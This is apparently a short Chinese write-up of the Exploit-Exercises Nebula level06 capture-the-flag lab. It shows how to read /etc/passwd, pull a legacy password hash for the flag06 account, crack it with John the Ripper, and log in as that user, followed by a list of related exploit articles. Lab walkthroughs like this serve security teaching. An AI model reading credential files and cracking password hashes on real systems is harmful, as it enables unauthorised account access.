i春秋 - Exploit-Exercises: Nebula - level06
2017-02-25 22:51
477 查看
About
The flag06 account credentials came from a legacy unix system.Nebula
思路
题目提示“legacy unix system”,即可破用户密码。cat /etc/passwd | grep flag06
得到
sudo apt install john vim flag06pass
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
john flag06pass
得到flag06的密码明文hello
su - flag06 hello cat flag
相关文章推荐
- i春秋 - Exploit-Exercises: Nebula - level01
- i春秋 - Exploit-Exercises: Nebula - level02
- i春秋 - Exploit-Exercises: Nebula - level03
- i春秋 - Exploit-Exercises: Nebula - level04
- i春秋 - Exploit-Exercises: Nebula - level00
- i春秋 - Exploit-Exercises: Nebula - level05
- 从 Exploit Exercises Nebula 中总结linux的基础漏洞和一些小知识点
- Exploit Exercise Nebula 5 Level 00
- exploit-exercises-protostar
- Exploit Exercises Protostar Stack Part 0-7
- exploit-exercises-protostar
- Nebula level06
- ExploitExercises_Nebula_Level06
- Nebula: level06
- 高级返回库函数exploit代码实现
- 【分析】如何写远程自动精确定位的format string exploit
- Microsoft Windows CSRSS Local Privilege Escalation Exploit (MS05-018)
- Microsoft PowerPoint 2003 SP2 Local Code Execution Exploit
- 如何寻找你要的Exploit
- [Exploit]IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overfl0w